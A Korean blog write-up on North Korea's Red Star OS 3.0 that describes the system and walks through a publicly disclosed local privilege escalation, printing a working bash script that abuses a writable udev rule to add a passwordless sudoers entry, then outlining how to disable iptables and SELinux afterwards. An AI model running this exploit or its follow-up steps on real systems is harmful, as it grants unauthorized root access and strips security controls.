붉은별 OS 3.0 local privilege escalation POC

북한에서 사용한다는 붉은별 OS

 

그 버전은 이미 2.0을 지나 3.0까지 지난해 말 익명의 pastebin에서 공개되었다.

 

해외에는 많은 사람들이 뜯어보기 시작했다고 한다. 아직 국내는 그리 많지 않은 건지 자세히는 모르겠다.

 

현재는 북한 일반인들만 이 OS를 사용한다는 설도 있다.

 

 

처음 봤을 땐 맥OS X인줄 알았다. 맥과 흡사한 이 OS는 Redhat 기반의 리눅스 OS이다.

북한의 윗분은 정작 맥프레를 쓰던데…그거 하나면 밥이몇공기여…

 

 

기본적인 기능은 다 있는 것 같다. 그런데 다 한글로 바뀌니…아니 북한언어로 바뀌니 몇몇은 이상하다.

심지어 터미널은 고전형 프로그람 안에 있어서 찾는데 시간이 조금 걸렸다.

 

레드햇 계열의 리눅스라면 rpm을 사용할 것이고, yum은 repo를 보니 rpm으로 URL이 걸려 있더라.

 

굳이 수정해 보지는 않으려 한다.

 

 

커널은 상당히 오래된 2.6.38을 사용 중이며 각 릴리즈버전은 뭐.. 저렇게 되어있다.

커널이 낮은만큼 SW도 구버전을 사용하고 있으며 상당히 취약점이 많을 것이라 한다.

 

그래도 보안은 어느정도 되어있다. SELINUX와 iptables로 막혀있어 통신이 되지 않고

heartbleed 취약점도 영향을 받지 않는 버전(0.9.8g)으로 나와있다.

 

이제 권한 탈취를 한번 해보려 한다.

이 취약점은 /etc/udev/rules.d/85-hplj10xx.rules 파일을 수정할 수가 있어서 생기는 취약점으로

이 파일을 수정해 RUN+= 인자를 실행하여 udev.d에 의해 루트 권한이 실행 되는 공격이다.

이 취약점을 이용한 코드도 이미 공개 되어있다.

 

1 2 3 4 5 6 7 8 9 10 11

#!/bin/bash -e cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules cat <<EOF >/tmp/r00t.sh echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules rm /tmp/r00t.shEOFchmod +x /tmp/r00t.sh echo "sudo will be available after reboot" sleep 2 reboot Colored by Color Scripter

cs

이 코드를 실행하면 취약한 rules파일에 저 코드를 삽입하고 결정적으로 sudo 명령어를 비밀번호 입력 없이 사용할 수 있게 한다.

그리고 재부팅이 되며 재부팅 후에 sudo sh같이 입력하게 되면 비밀번호 없이 루트계정으로 들어오게 된다.

 

이 후에 iptable를 지우고 selinux를 enforce에서 disabled로 바꾸고 등의 작업을 하면 통신이 가능해지며

이전 passwd에 root의 실행되는 쉘에 /sbin/nologin을 바꾸면 로그인도 가능해진다.

 

 

Reference.

notes on red star os 3.0 - https://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/

Looking at Redstar 3.0 (붉은별) closely - http://dandylife.net/blog/archives/tag/linux

Hands on with North Korea's official Red Star 3.0 Server linux operating system - http://geekslop.com/2015/installing-north-koreas-official-red-star-3-0-server-operating-system

CVE request: local privilege escalation flaws in Red Star OS 3.0 & 2.0 desktop - http://seclists.org/oss-sec/2015/q1/101